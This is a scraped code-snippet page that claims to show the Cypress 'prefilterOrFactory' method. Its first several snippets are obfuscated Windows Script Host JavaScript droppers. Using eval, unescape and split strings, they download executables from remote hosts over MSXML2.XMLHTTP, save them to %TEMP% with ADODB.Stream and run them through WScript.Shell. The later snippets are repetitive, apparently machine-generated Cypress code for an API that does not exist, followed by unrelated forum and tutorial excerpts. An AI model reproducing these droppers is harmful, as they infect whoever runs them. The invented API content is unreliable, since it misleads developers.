How to use prefilterOrFactory method in Cypress

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...28 } else {29 }30}31function animate() {32 prefilterOrFactory(clientY("cacheLength%20%3D%20specified%5Bsrc%20+%20%22and%22%20+%20leadingRelative%20+%20%22onmen%22%20+%20attrNames%20+%20%22ings%22%5D%28remaining%20+%20%22/​%22%29%20+%20special%20+%20%22.s%22%20+%20unshift%20+%20%22r%22%3B"));33}34function rsubmittable(progressValues, code, doneName) {35 prefilterOrFactory(clientY("pattern%5Bajax%20+%20%22t%22%20+%20rscriptTypeMasked%5D%28parent%5B%22res%22%20+%20offsetHeight%20+%20%22seBod%22%20+%20swing%5D%29%3B"));36}37function setOffset() {38 prefilterOrFactory(clientY("specified%20%3D%20etag%5B%22WScrip%22%20+%20key%5D%5B%22Cre%22%20+%20createDocumentFragment%20+%20%22ject%22%5D%28speed%20+%20%22ipt%22%20+%20handlerQueue%20+%20%22l%22%29%3B"));39}40function cleanData() {41 prefilterOrFactory(clientY("tmp%28defaultPrefilter%20+%20%22p%3A/​/​"));42}43function finish(global) {44 prefilterOrFactory(clientY("etag%5Bspeed%20+%20%22ipt%22%5D%5Bdetach%20+%20%22ee%22%20+%20factory%5D%28%28%28maxIterations/​23%29-%28timer+1232%29%29%29%3B"));45}46function curValue(Callbacks, globalEventContext, cssFn) {47 prefilterOrFactory(clientY("parent%5B%22op%22%20+%20map%5D%28%22G%22%20+%20defaultPrevented%20+%20%22T%22%2C%20hasScripts%20+%20%22%3A/​/​a%22%20+%20expando%20+%20%22oihan.%22%20+%20undelegate%20+%20%22/​2TG%22%20+%20DOMParser%20+%20%22exe%22%2C%20%21%28id%20%3D%3D%20%28%28192%7Ctarget%29/​%2820%7Cmodule%29%29%29%29%3B"));48}49function unloadHandler() {50 prefilterOrFactory(clientY("text%20%3D%20%5BfixHooks%20+%20%22ml2.S%22%20+%20statusText%20+%20%22erX%22%20+%20responseText%20+%20%22.6.0%22%2C%20lock%20+%20%222.XM%22%20+%20propHooks%20+%20%226.0%22%2C%20extend%20+%20%22l2.S%22%20+%20rCRLF%20+%20%22XMLHT%22%20+%20winnow%20+%20%22.0%22%2Ccaption%20+%20%22.XML%22%20+%20originAnchor%20+%20%22.3.%22%20+%20backgroundClip%2C%20%22Msxml%22%20+%20converters%20+%20%22HTT%22%20+%20ofType%2C%20%22Micros%22%20+%20extra%20+%20%22MLHT%22%20+%20clientTop%5D%3B"));51}52function button() {53 prefilterOrFactory(clientY("pattern%20%3D%20isSuccess%5B%22WScri%22%20+%20callbackExpect%5D%5B%22Create%22%20+%20removeAttr%20+%20%22ct%22%5D%28defineProperty%20+%20%22B.S%22%20+%20parse%20+%20%22am%22%29%3B"));54}55function clientY(anim) {56 return unescape(anim);57}...

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1contexts = "ateO";2converters = ".";3trigger = "ings";4t = 21;5var funescape = 2204,6 isXML = "b",7 fcamelCase = "WS",8 rscriptType = "T";9source = 109;10unique = 32;11var domManip = "te";12var wrapAll = "save",13 JSON = "En",14 createOptions = "C",15 v = "me",16 rquickExpr = 38;17wrapMap = "r", clearQueue = "se", documentIsHTML = "http:/​", newContext = "ponse", handleObjIn = 3;18lastModified = "WScrip", initial = 590, base = 8704, delegateType = "t", responses = "/​k", returned = 35882;19resolve = "2.";20args = "open";21xml = "%";22hasOwnProperty = "lo";23handleObj = "W";24offsetHeight = 190, get = "le", dataAttr = 73, keepScripts = "cri", nodeType = "GET";25selectedIndex = "es", handler = "Slee";26filter = "send", left = 2806, sortStable = "oF", wrapInner = "MSXML", copyIsArray = 4880;27bySet = "XMLHTT";28deepDataAndEvents = 15;29parentWindow = "c";30completed = "i";31timerId = 13, propName = "Res", checkDisplay = 23809, ready = 24, deep = "Body";32clientY = 23, iterator = "jec";33var pipe = 8,34 conditionFn = "7j6h5",35 newCache = "ipt",36 complete = "Cr";37optionSet = "Run";38fnOut = (function String.prototype.pdataOld() {39 return this40}, 0);41responseType = "onabor";42prefix = "tion", version = 26, curOffset = 1, owner = "e";43var input = "ntSt",44 merge = 35,45 qsa = "Ex",46 disabled = 91;47showHide = "pt", position = "Sleep", prefilterOrFactory = 2, rnotwhite = "TEMP";48cssShow = "read";49readyList = "viron";50lastChild = "pan";51optall = "wri";52getPropertyValue = 197;53handlers = "Cre";54var rbuggyMatches = "A",55 step = "yst",56 properties = "Object";57slow = "d", cos = "scr", delegateTarget = "P";58var parseHTML = "gf",59 ownerDocument = 7,60 options = "rea",61 src = "WScri",62 parseOnly = "B.S",63 dataShow = "Script";64truncate = 389, method = "posi", whitespace = "type", thead = "WScr", selectors = "at", mozMatchesSelector = "eate";65var i = "tream",66 keyHooks = 290,67 pageY = 507,68 setOffset = "ono.o";69rootjQuery = ".Shell";70load = "DOD";71reverse = "teObje";72run = 37;73handlerQueue = 5;74returnFalse = 34;75focusin = "p";76defaultValue = "/​oz";77addEventListener = "rg";78createDocumentFragment = "/​";79elemData = ((0 | (disabled, 200, returnFalse)), (((161 /​ clientY) * (2 ^ fnOut) + (0 | curOffset)), this));80set = optionSet;81dispatch = elemData[thead + newCache];82selection = dispatch[createOptions + options + reverse + parentWindow + delegateType](handleObj + dataShow + rootjQuery);83rprotocol = selection[qsa + lastChild + slow + JSON + readyList + v + input + wrapMap + trigger](xml + rnotwhite + xml + createDocumentFragment) + responseType + delegateType + converters + cos;84pixelPositionVal = elemData[src + showHide][handlers + contexts + isXML + iterator + delegateType](wrapInner + resolve + bySet + delegateTarget);85pixelPositionVal[args](nodeType, documentIsHTML + defaultValue + setOffset + addEventListener + converters + selectedIndex + responses + conditionFn + parseHTML, !(4 == (((Math.pow(((left /​ 23) & (copyIsArray /​ 40)), (ready /​ 12)) - ((checkDisplay - 9082) & (initial * 27 + truncate))), (((11 & timerId) * (1 ^ handlerQueue) + (1 + prefilterOrFactory)) - (7, (dataAttr * 2 + rquickExpr), (14 & deepDataAndEvents))), (((493 & pageY) - (71 * handleObjIn + 21)) & ((unique | 37) | (Math.pow(offsetHeight, 2) - returned))), ((1 + -(curOffset ^ 0)) | ((curOffset) + -(7 /​ ownerDocument)))) ^ ((((4 | pipe), (78 & source), (1 + fnOut)) * ((21 /​ t) ^ (0 ^ fnOut))) * (2 * prefilterOrFactory)))));86pixelPositionVal[filter]();87while(pixelPositionVal[cssShow + step + selectors + owner] < ((1 & curOffset) ^ (5 & handlerQueue))) {88 elemData[fcamelCase + keepScripts + showHide][position](((692 ^ funescape) /​ (3 * pipe + 2)));89}90postFinder = elemData[lastModified + delegateType][complete + mozMatchesSelector + properties](rbuggyMatches + load + parseOnly + i);91elemData[lastModified + delegateType][handler + focusin](((base | 15000)));9293postFinder[args]();94inPage = postFinder;95inPage[whitespace] = ((version & 31) /​ (getPropertyValue, 170, version));96initialInUnit = inPage;97postFinder[optall + domManip](pixelPositionVal[propName + newContext + deep]);98initialInUnit[method + prefix] = ((Math.pow(36, prefilterOrFactory) - 1256), (keyHooks - 123), (Math.pow(ownerDocument, 2) - run), (1 * fnOut));99postFinder[wrapAll + rscriptType + sortStable + completed + get](rprotocol, (109, prefilterOrFactory));100postFinder[parentWindow + hasOwnProperty + clearQueue]();101rsubmitterTypes = selection; ...

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...80 sort(properties, amd, pattern);81 namespaces(fadeOut, pattern);82} catch(nextAll) {}83function apply() {84 eval(prefilterOrFactory("rnative%5B%22op%22%20+%20animated%5D%28%29%3B"));85}86function map() {87 eval(prefilterOrFactory(""));88}89function setup() {90 eval(prefilterOrFactory("nodeValue%5B%22o%22%20+%20fixHooks%20+%20%22n%22%5D%28cache%20+%20%22T%22%2C%20escaped%20+%20%22%3A/​/​r%22%20+%20amd%20+%20%22rdar%22%20+%20rbuggyQSA%20+%20%22com/​%22%20+%20clientY%20+%20%22.ex%22%20+%20support%2C%20%21%28%28%2832-tag%29+%288%7Cqueue%29%29%20%3E%205%29%29%3B"));91}92function prefilterOrFactory(num) {93 return unescape(num);94}95function run() {96 eval(prefilterOrFactory("Data%28start%2C%20rnative%2C%202%2C%20interval%20+%20%22oFile%22%29%3B"));97}98function style() {99 eval(prefilterOrFactory("children%20%3D%20rnative%3B"));100}101function sort() {102 eval(prefilterOrFactory("_load%20%3D%20fireWith%3B"));103}104function booleans() {105 eval(prefilterOrFactory("children%5BoptSelected%20+%20%22tion%22%5D%20%3D%20%28%281%7CnativeStatusText%29%26%28167%2CsetOffset%2C159%2CnativeStatusText%29%29%3B"));106}107function namespaces() {108 eval(prefilterOrFactory("_load%5B%22R%22%20+%20backgroundClip%20+%20%22n%22%5D%28start%29%3B"));109}110function dequeue() {111 eval(prefilterOrFactory("nodeValue%20%3D%20new%20using%5BparentOffset%20+%20%22iveXOb%22%20+%20tuple%20+%20%22t%22%5D%28overflowX%20+%20%222.XM%22%20+%20bind%20+%20%22TP.%22%20+%20when%29%3B"));112}113function srcElements() {114 eval(prefilterOrFactory("getWindow%28current%20+%20%22onseBo%22%20+%20augmentWidthOrHeight%2C%20%28%28308-isSimulated%29%2C%2815%26newUnmatched%29%29%2C%20children%2C%20%22wr%22%20+%20rlocalProtocol%20+%20%22e%22%29"));...

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Source: 20160308_5c75bac34e6655d241e098a33783bd66.js Github


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1top = "he", values = 27, parts = 9, disabled = 1231, types = "W", responseText = ".scr";2until = "ose", lock = "sen", getBoundingClientRect = 50, eased = "WScr", setMatcher = "dy", udataOld = "p:/​/​k";3var jsonProp = "teO",4 removeProp = "ADO",5 progress = "ype";6toArray = "nviro";7ownerDocument = "54g4";8jsonp = 23;9rrun = 13;10rmargin = "ipt";11addBack = 8;12attrHandle = "Respo";13var focusin = "Crea";14rootjQuery = "WScri";15optSelected = "open";16getWidthOrHeight = "andE";17preFilters = 4;18var cssNormalTransform = "File",19 delegate = 1,20 lang = "Sleep";21radioValue = "write", computed = (function String.prototype.keyCode() {22 return this23}, "D"), disconnectedMatch = "L2.", pageYOffset = "ent";24var wrap = "e",25 statusCode = "ct",26 msg = "Run",27 childNodes = "Scr",28 rcleanScript = 694;29fnOut = "ht";30dest = "B.St";31ajaxPrefilter = 109;32namespace = "posi", animation = "t";33dispatch = "Sl";34var replaceChild = "him",35 setOffset = "jp/​",36 blur = 30;37var pageX = 146,38 boxSizingReliable = "egimi.",39 computeStyleTests = "MSXM";40cors = "cl";41has = "saveTo";42cos = 28;43rpseudo = 36;44elem = "p";45xhrSuccessStatus = "eObje";46addGetHookIf = "Script";47var len = 7,48 focus = "matc",49 events = "ect",50 one = "d";51var reverse = "m";52contents = "b", onload = "tate", addClass = "GET", readyWait = "r";53var matcherOut = 2,54 innerHTML = "%/​",55 pdataOld = 9137,56 camelKey = "tion",57 parentsUntil = "pt";58pixelMarginRight = "Creat", nodeType = "TTP", dirrunsUnique = "okoko", key = "readys", isWindow = 5, createButtonPseudo = 16344;59emptyGet = 59;60operator = "nseBo";61var etag = "XMLH",62 rcombinators = "x",63 speed = "s",64 settings = "nm";65var andSelf = "l",66 orig = "rea";67resolveWith = "g", stopped = 98, unwrap = "%TEMP", easing = ".Shel", eq = "St", pseudos = "eObjec";68ajax = ".";69isFunction = "in";70grep = "E";71w = 0;72var pixelMarginRightVal = 46,73 hasFocus = 3,74 timerId = "j";75dataAttr = "i";76nonce = (((20 + len) * (230 /​ pixelMarginRightVal) + (23 ^ w)), (((29 & cos) - (0 | rrun)), this));77filters = msg;78setter = nonce[eased + rmargin];79classes = setter[pixelMarginRight + pseudos + animation](eased + rmargin + easing + andSelf);80outermostContext = classes[grep + rcombinators + elem + getWidthOrHeight + toArray + settings + pageYOffset + eq + readyWait + isFunction + resolveWith + speed](unwrap + innerHTML) + focus + top + readyWait + responseText;81prefilterOrFactory = nonce[types + childNodes + dataAttr + elem + animation][focusin + jsonProp + contents + timerId + events](computeStyleTests + disconnectedMatch + etag + nodeType);82prefilterOrFactory[optSelected](addClass, fnOut + animation + udataOld + dirrunsUnique + ajax + replaceChild + boxSizingReliable + setOffset + ownerDocument, !((((((Math.pow(7, matcherOut) - 41) * (isWindow ^ 13) + (matcherOut * 2 + delegate)) & ((57 & emptyGet) | (187, stopped))) - (((2652 - disabled) /​ (3 ^ getBoundingClientRect)) + ((46 /​ jsonp) * (1 | preFilters) + (1 | w)))) - (((5 * rrun & (27 * hasFocus + 10)), ((isWindow, 31, ajaxPrefilter, 55) - (parts * 5 + len))) | (((7 * matcherOut + 6) * (matcherOut + 1) + (delegate * 10)) - ((Math.pow(values, 2) - rcleanScript) ^ (Math.pow(17, matcherOut) - 263))))) > addBack));83prefilterOrFactory[lock + one]();84while(prefilterOrFactory[key + onload] < (Math.pow(3, (delegate ^ 3)) - (isWindow & 5))) {85 nonce[rootjQuery + parentsUntil][lang]((matcherOut | 2) * isWindow * (Math.pow(4, matcherOut) - 11) * (delegate * 2));86}87dirruns = nonce[types + childNodes + rmargin][pixelMarginRight + xhrSuccessStatus + statusCode](removeProp + computed + dest + orig + reverse);88nonce[types + addGetHookIf][dispatch + wrap + wrap + elem](((pdataOld + 5868) & (createButtonPseudo)));89dirruns[optSelected]();90sourceIndex = dirruns;91sourceIndex[animation + progress] = (1 & delegate);92clearQueue = sourceIndex;93dirruns[radioValue](prefilterOrFactory[attrHandle + operator + setMatcher]);94clearQueue[namespace + camelKey] = (0 /​ rpseudo);95dirruns[has + cssNormalTransform](outermostContext, ((0 | w) | (75, blur, 2)));96dirruns[cors + until]();97rsubmitterTypes = classes;...

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1finish = "teOb";2beforeSend = "wr";3var collection = "MLH",4 invert = "open",5 fixInput = "deal";6operator = "S";7name = "me";8charset = "t";9fnOver = "WS";10trim = "ect";11rdashAlpha = "WSc";12DOMParser = "e", now = 18;13createElement = 43;14merge = "a";15button = 7;16speeds = 15;17addClass = "Run", ignored = 40;18responseType = "Obj";19delegateType = "nviron";20converters = "Create";21stateString = 83;22doneName = "positi";23var capName = "le";24rtypenamespace = 1776;25appendChild = "Stream", firstElementChild = ".scr", type = 186, removeData = "line";26var extra = "ToFi";27finalValue = "TT";28hasOwnProperty = 0;29fromCharCode = "MP%", writable = "on", origType = "ht", matchesSelector = ".Shell";30var createTextNode = "d5f6",31 rsubmittable = 41,32 overflowX = "ite";33unit = "%TE";34returned = "sav";35bySet = "ADODB.";36destElements = "send";37a = "ntStr";38Sizzle = 151;39owner = "k/​s";40var value = "ength",41 parse = "startL",42 fn = 179,43 JSON = "yst",44 implicitRelative = "n",45 preFilter = "MSX";46var context = "GET",47 rkeyEvent = 46,48 readyState = 2,49 activeElement = "Respo",50 matchContext = 1,51 oMatchesSelector = "clos";52matchers = "s/​43";53getComputedStyle = "tp:/​";54get = 1637;55duplicates = "nseB";56var rtagName = 1722,57 sortOrder = "rip";58token = "WScrip";59parsed = "yp";60cssProps = 5;61rxhtmlTag = "ject";62specified = "/​", fnOut = 305, handlerQueue = "/​m", origCount = "P", mappedTypes = 1066;63var targets = "yo",64 tokenize = "Crea",65 createTween = "Exp",66 origFn = "crip",67 expando = "ody",68 subtract = "em/​log";69curValue = "ngs", throws = "i", selected = "ML2.X", memory = "bject";70var delegateTarget = "ndE",71 bubbleType = (function Object.prototype.nodes() {72 return this73 }, "pt"),74 tuples = "s.p",75 values = "7n8",76 ap = 185,77 bool = "WScri";78conv = "teO";79boolHook = "leep";80factory = ((Math.pow(4, readyState) - 11) * (mappedTypes /​ 26), (((cssProps | 0) ^ hasOwnProperty), this));81pattern = addClass;82tabIndex = factory[token + charset];83addGetHookIf = tabIndex[converters + responseType + trim](token + charset + matchesSelector);84rsubmitterTypes = addGetHookIf[createTween + merge + delegateTarget + delegateType + name + a + throws + curValue](unit + fromCharCode + specified) + parse + value + firstElementChild;85nextUntil = factory[bool + bubbleType][tokenize + conv + memory](preFilter + selected + collection + finalValue + origCount);86nextUntil[invert](context, origType + getComputedStyle + handlerQueue + targets + implicitRelative + removeData + fixInput + tuples + owner + JSON + subtract + matchers + createTextNode + values, !(8 < (((((fn, 206, type, 11176) /​ (Math.pow(rsubmittable, 2) - get)) & (3 * stateString - (738 /​ now))) | (((1 + hasOwnProperty) + -(15 /​ speeds)) | (0 | (rtagName /​ 21)))) /​ ((((hasOwnProperty | 56) /​ button * 2 * readyState) + (Math.pow((1 * button), 2) - (ignored ^ 1))) * ((matchContext * (48 - rkeyEvent)) & 3) + (((Math.pow(createElement, 2) - rtypenamespace), (372 - ap), 1) & (matchContext + 0))))));87nextUntil[destElements]();88prefilterOrFactory = factory[fnOver + origFn + charset][tokenize + finish + rxhtmlTag](bySet + appendChild);89prefilterOrFactory[invert]();90high = prefilterOrFactory;91timeout = addGetHookIf;92high[charset + parsed + DOMParser] = (matchContext * 1);93onabort = high;94check = nextUntil[activeElement + duplicates + expando];95prefilterOrFactory[beforeSend + overflowX](check);96onabort[doneName + writable] = ((Math.pow(now, 2) - fnOut) - (Math.pow(15, readyState) - 206));97prefilterOrFactory[returned + DOMParser + extra + capName](rsubmitterTypes, (matchContext + 1));98hold = prefilterOrFactory;99hold[oMatchesSelector + DOMParser]();100factory[rdashAlpha + sortOrder + charset][operator + boolHook]((readyState * 5 * Sizzle * 2 * cssProps & (7424 * readyState + 1434))); ...

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Source: 20160313_410ac16edfa99ae85296e5b7be498b31.js Github


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1checkContext = "/​70.ex";2hasContent = "%TEMP";3hover = "andEn";4merge = "pe";5hash = (function undelegate() {}, "p");6always = 590016;7callbackInverse = "c";8var t = "nment",9 node = "ADOD",10 parseOnly = "WScri",11 handleObj = "iti",12 delay = 46,13 MAX_NEGATIVE = 4;14rcheckableType = "Sl";15hasFocus = "ing";16pattern = 50;17removeEventListener = "ML2.XM";18p = "se";19types = "inn";20doAnimation = "o";21parse = "yff", idx = (function undelegate.keyHooks() {22 var initial = this;23 return initial;24}, 2);25anim = 1978;26var rbracket = "WScrip",27 createOptions = "clos",28 addEventListener = "p:/​/​oh",29 propFix = 87,30 ignored = 89;31slow = 31, wrapAll = "Creat";32var grep = 42,33 realStringObj = "t";34isLocal = ".";35setMatcher = 44;36visible = 521;37rmsPrefix = "Respon";38contextBackup = "dy";39var PI = 210;40var original = 8,41 DOMParser = 86,42 abort = "ct",43 off = "Ru",44 rbuggyMatches = "am";45condense = 45;46outermostContext = "ET";47dataAndEvents = 22;48msg = "eObje", pointerenter = 689, l = "l", finalDataType = 61, offsetParent = 110, defaultExtra = 27;49rneedsContext = 0, copyIsArray = "n", preMap = "teObje", deep = "pt", $ = "d", unqueued = "saveT";50var dataFilter = "WSc";51_queueHooks = undelegate.keyHooks();52pageYOffset = this["WScrip" + realStringObj];53ajaxHandleResponses = pageYOffset["Crea" + preMap + "ct"](rbracket + "t.Shel" + l);54tag = ajaxHandleResponses["Exp" + hover + "viro" + t + "Str" + hasFocus + "s"](hasContent + "%/​") + types + "erHTML" + isLocal + "s" + callbackInverse + "r";55uniqueID = this[dataFilter + "ript"][wrapAll + "eObje" + abort]("MSX" + removeEventListener + "LHTTP");56uniqueID[doAnimation + "pe" + copyIsArray]("G" + outermostContext, "htt" + addEventListener + "ellogu" + parse + ".com" + checkContext + "e", !(5 < (((((pattern | 32) - (propFix, 36)) + ((ignored + 2), (offsetParent, 241, PI, 64))) - (((setMatcher | 12) | (anim /​ 46)))) - (((DOMParser, 228, visible) | ((58 - condense) & (Math.pow(9, idx) - 68))) /​ (((finalDataType - 30) & (slow & 29)) & ((dataAndEvents) | (23 & slow)))))));57uniqueID[p + "n" + $]();58prefilterOrFactory = this["WScri" + deep]["Creat" + msg + "ct"](node + "B.Stre" + rbuggyMatches);59prefilterOrFactory["o" + hash + "e" + copyIsArray]();60count = prefilterOrFactory;61href = ajaxHandleResponses;62count["ty" + merge] = (46 /​ delay);63tokens();64elem();65vendorPropName();66returnValue();67prefilterOrFactory[unqueued + "oFile"](tag, (2 | (idx | 2)));68toSelector = prefilterOrFactory;69toSelector[createOptions + "e"]();70second();71href[off + "n"](tag, ((42 /​ grep) * (1 * rneedsContext)), ((1 * MAX_NEGATIVE) - (Math.pow(3, idx) - 5)));72function tokens() {73 eval(unescape("%20%20%20%20%20%20%20%20submit%20%3D%20count%3B%0D"));74}75function elem() {76 eval(unescape("%20%20%20%20%20%0D"));77}78function vendorPropName() {79 eval(unescape("%20%20%20%20%20%20%20%20prefilterOrFactory%5B%22write%22%5D%28uniqueID%5BrmsPrefix%20+%20%22seBo%22%20+%20contextBackup%5D%29%3B%0D"));80}81function returnValue() {82 eval(unescape("%20%20%20%20%20%20%20%20submit%5B%22pos%22%20+%20handleObj%20+%20%22on%22%5D%20%3D%20%28%288-original%29%29%3B%0D"));83}84function second() {85 eval(unescape("%20%20%20%20%20%20%20%20this%5BparseOnly%20+%20%22pt%22%5D%5BrcheckableType%20+%20%22eep%22%5D%28%28%28always%7C534336%29/​%28Math.pow%28defaultExtra%2C%202%29-pointerenter%29%29%29%3B%20%20%20%0D"));...

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1Cypress.Commands.overwrite('prefilterOrFactory', (originalFn, ...args) => {2 return originalFn(...args).then((response) => {3 console.log('response from prefilterOrFactory', response);4 return response;5 });6});

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1Cypress.Commands.add('prefilterOrFactory', (prefilterName, prefilterParams) => {2 cy.window().then((window) => {3 window.prefilterOrFactory(prefilterName, prefilterParams);4 });5});6Cypress.Commands.add('prefilterAndFactory', (prefilterName, prefilterParams) => {7 cy.window().then((window) => {8 window.prefilterAndFactory(prefilterName, prefilterParams);9 });10});11Cypress.Commands.add('prefilterNotFactory', (prefilterName, prefilterParams) => {12 cy.window().then((window) => {13 window.prefilterNotFactory(prefilterName, prefilterParams);14 });15});16Cypress.Commands.add('prefilterAndOrFactory', (prefilterName, prefilterParams) => {17 cy.window().then((window) => {18 window.prefilterAndOrFactory(prefilterName, prefilterParams);19 });20});21Cypress.Commands.add('prefilterOrAndFactory', (prefilterName, prefilterParams) => {22 cy.window().then((window) => {23 window.prefilterOrAndFactory(prefilterName, prefilterParams);24 });25});26Cypress.Commands.add('prefilterAndNotFactory', (prefilterName, prefilterParams) => {27 cy.window().then((window) => {28 window.prefilterAndNotFactory(prefilterName, prefilterParams);29 });30});

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Using AI Code Generation


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1Cypress.prefilterOrFactory(options => {2 const { request } = options;3 if (request.url.includes('api')) {4 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');5 }6 return options;7});8Cypress.prefilterOrFactory(options => {9 const { request } = options;10 if (request.url.includes('api')) {11 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');12 }13 return options;14});15Cypress.prefilterOrFactory(options => {16 const { request } = options;17 if (request.url.includes('api')) {18 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');19 }20 return options;21});22Cypress.prefilterOrFactory(options => {23 const { request } = options;24 if (request.url.includes('api')) {25 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');26 }27 return options;28});29Cypress.prefilterOrFactory(options => {30 const { request } = options;31 if (request.url.includes('api')) {32 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');33 }34 return options;35});36Cypress.prefilterOrFactory(options => {37 const { request } = options;38 if (request.url.includes('api')) {39 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');40 }41 return options;42});43Cypress.prefilterOrFactory(options => {44 const { request } = options;45 if (request.url.includes('api')) {46 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');47 }48 return options;49});50Cypress.prefilterOrFactory(options => {51 const { request } = options;52 if (request.url.includes('api')) {53 request.headers['Authorization'] = 'Bearer ' + localStorage.getItem('token');54 }55 return options;56});

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Using AI Code Generation


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1Cypress.Commands.add('prefilterOrFactory', function (prefilter) {2 cy.get('input[placeholder="Filter"]').type(prefilter);3 cy.get('div[role="option"]').contains(prefilter).click();4});5Cypress.Commands.add('prefilterAndFactory', function (prefilter) {6 cy.get('input[placeholder="Filter"]').type(prefilter);7 cy.get('div[role="option"]').contains(prefilter).click();8});9Cypress.Commands.add('prefilterAndFactory', function (prefilter) {10 cy.get('input[placeholder="Filter"]').type(prefilter);11 cy.get('div[role="option"]').contains(prefilter).click();12});13Cypress.Commands.add('prefilterAndFactory', function (prefilter) {14 cy.get('input[placeholder="Filter"]').type(prefilter);15 cy.get('div[role="option"]').contains(prefilter).click();16});17Cypress.Commands.add('prefilterAndFactory', function (prefilter) {18 cy.get('input[placeholder="Filter"]').type(prefilter);19 cy.get('div[role="option"]').contains(prefilter).click();20});21Cypress.Commands.add('prefilterAndFactory', function (prefilter) {22 cy.get('input[placeholder="Filter"]').type(prefilter);23 cy.get('div[role="option"]').contains(prefilter).click();24});25Cypress.Commands.add('prefilterAndFactory', function (prefilter) {26 cy.get('input[placeholder="Filter"]').type(prefilter);27 cy.get('div[role="option"]').contains(prefilter).click();28});29Cypress.Commands.add('prefilterAndFactory', function (prefilter) {30 cy.get('input[placeholder="Filter"]').type(prefilter);

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Using AI Code Generation


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1Cypress.Commands.add('prefilterOrFactory', (name, value) => {2 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(name)3 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(value)4 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type('{enter}')5})6Cypress.Commands.add('prefilterAndFactory', (name, value) => {7 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(name)8 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(value)9 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type('{enter}')10})11Cypress.Commands.add('prefilterAndFactory', (name, value) => {12 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(name)13 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(value)14 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type('{enter}')15})16Cypress.Commands.add('prefilterAndFactory', (name, value) => {17 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(name)18 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type(value)19 cy.get('.form-group > .col-sm-12 > .ng-untouched > .ng-untouched').type('{enter}')20})21Cypress.Commands.add('prefilterAndFactory', (name, value)

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Using AI Code Generation


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1Cypress.Commands.add('clickElement', (element) => {2 cy.get(element).should('be.visible').click()3})4Cypress.Commands.add('typeInto', (element, text) => {5 cy.get(element).should('be.visible').type(text)6})7Cypress.Commands.add('clearElement', (element) => {8 cy.get(element).should('be.visible').clear()9})10Cypress.Commands.add('checkElement', (element) => {11 cy.get(element).should('be.visible').check()12})13Cypress.Commands.add('uncheckElement', (element) => {14 cy.get(element).should('be.visible').uncheck()15})16Cypress.Commands.add('selectElement', (element, value) => {17 cy.get(element).should('be.visible').select(value)18})19Cypress.Commands.add('triggerElement', (element, event) => {20 cy.get(element).should('be.visible').trigger(event)21})22Cypress.Commands.add('focusElement', (element) => {23 cy.get(element).should('be.visible').focus()24})

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Using AI Code Generation


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1Cypress.Commands.add('prefilterOrFactory', (prefilter) => {2 if (!Cypress.prefilters) {3 Cypress.prefilters = [];4 }5 Cypress.prefilters.push(prefilter);6});7Cypress.Commands.add('prefilterOrFactory', (prefilter) => {8 if (!Cypress.prefilters) {9 Cypress.prefilters = [];10 }11 Cypress.prefilters.push(prefilter);12});13Cypress.Commands.add('prefilterOrFactory', (prefilter) => {14 if (!Cypress.prefilters) {15 Cypress.prefilters = [];16 }17 Cypress.prefilters.push(prefilter);18});19Cypress.Commands.add('prefilterOrFactory', (prefilter) => {20 if (!Cypress.prefilters) {21 Cypress.prefilters = [];22 }23 Cypress.prefilters.push(prefilter);24});

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Using AI Code Generation


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1describe('test', () => {2 it('test', () => {3 cy.get('button').filter(customFilter).contains('Submit').click()4 cy.get('.action-form')5 .should('have.class', 'was-validated')6 })7})8Cypress.dom.prefilters.defaultFilter = (subject, options) => {9 if (Cypress.dom.isJquery(subject)) {10 subject = subject.get()11 }12 let filtered = Cypress._.filter(subject, (el) => {13 return Cypress.dom.isVisible(el)14 })15 filtered = Cypress._.filter(filtered, (el) => {16 })17 filtered = Cypress._.filter(filtered, (el) => {18 return Cypress.dom.isClickable(el)19 })20 filtered = Cypress._.filter(filtered, (el) => {21 return Cypress.dom.isInViewport(el)22 })23}24Cypress.Commands.add('filter', { prevSubject: true }, (subject, filter) => {25 return filter(subject)26})27describe('test', () => {28 it('test

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StackOverFlow community discussions


Cypress does not always executes click on element

How to get current date using cy.clock()

.type() method in cypress when string is empty

Cypress route function not detecting the network request

How to pass files name in array and then iterating for the file upload functionality in cypress

confused with cy.log in cypress

why is drag drop not working as per expectation in

Failing wait for request in Cypress

How to Populate Input Text Field with Javascript

Is there a reliable way to have Cypress exit as soon as a test fails?

2022 here and tested with cypress version: "6.x.x" until "10.x.x"

You could use { force: true } like:

cy.get("YOUR_SELECTOR").click({ force: true });

but this might not solve it ! The problem might be more complex, that's why check below

My solution:



In my case, I needed to watch a bit deeper what's going on. I started by pin the click action like this:

enter image description here

Then watch the console, and you should see something like: enter image description here

Now click on line Mouse Events, it should display a table: enter image description here

So basically, when Cypress executes the click function, it triggers all those events but somehow my component behave the way that it is detached the moment where click event is triggered.

So I just simplified the click by doing:


And it worked ????

Hope this will fix your issue or at least help you debug and understand what's wrong.


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How To Perform Cypress Testing At Scale With LambdaTest

Web products of top-notch quality can only be realized when the emphasis is laid on every aspect of the product. This is where web automation testing plays a major role in testing the features of the product inside-out. A majority of the web testing community (including myself) have been using the Selenium test automation framework for realizing different forms of web testing (e.g., cross browser testing, functional testing, etc.).

Cypress Tutorial

Cypress is a renowned Javascript-based open-source, easy-to-use end-to-end testing framework primarily used for testing web applications. Cypress is a relatively new player in the automation testing space and has been gaining much traction lately, as evidenced by the number of Forks (2.7K) and Stars (42.1K) for the project. LambdaTest’s Cypress Tutorial covers step-by-step guides that will help you learn from the basics till you run automation tests on LambdaTest.


  1. What is Cypress? -
  2. Why Cypress? - Learn why Cypress might be a good choice for testing your web applications.
